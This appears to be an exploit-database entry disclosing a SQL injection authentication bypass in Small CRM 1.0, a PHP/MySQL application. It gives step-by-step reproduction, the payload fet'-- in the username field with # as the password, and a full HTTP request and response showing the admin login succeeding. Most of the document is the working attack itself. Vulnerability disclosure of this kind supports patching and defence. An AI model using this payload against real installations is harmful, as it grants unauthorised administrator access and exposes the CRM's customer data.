Small CRM version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
# Exploit Title: Small CRM Developed using PHP and MySQL - SQLi Authentication Bypass
# Date: 05.06.2024
# Exploit Author: Furkan Eren Tetik
# Vendor Homepage: https://phpgurukul.com/php-projects-free-downloads
# Software Link: https://phpgurukul.com/small-crm-php
# Version: 1.0
# Tested on: Windows 11, Kali Linux
# Small CRM Developed System Login page can be bypassed with a simple SQLi to the username parameter.
# https://www.linkedin.com/in/furkanerentetik/
Steps To Reproduce:
1 - Go to the login page http://localhost/crm/crm/admin/
2 - In the username field, enter the data value as "fet'--" without double quotes, and in the password field, enter a # sign.
3 - Click on "Login" button and you are logged in as administrator.
PoC
Request
POST /crm/crm/admin/ HTTP/1.1
Host: localhost
Content-Length: 34
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="101"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/crm/crm/admin/
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: online_clinic_management_system=9fcs116dusfd3m2gjh88b8s777; PHPSESSID=9ti9hb3hc6484bubl69jlaa9t5
Connection: close
email=fet%27--&password=%23&login=
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Response
HTTP/1.1 200 OK
Date: Tue, 04 Jun 2024 21:58:52 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 48
Connection: close
Content-Type: text/html; charset=UTF-8
<script>window.location.href='home.php'</script>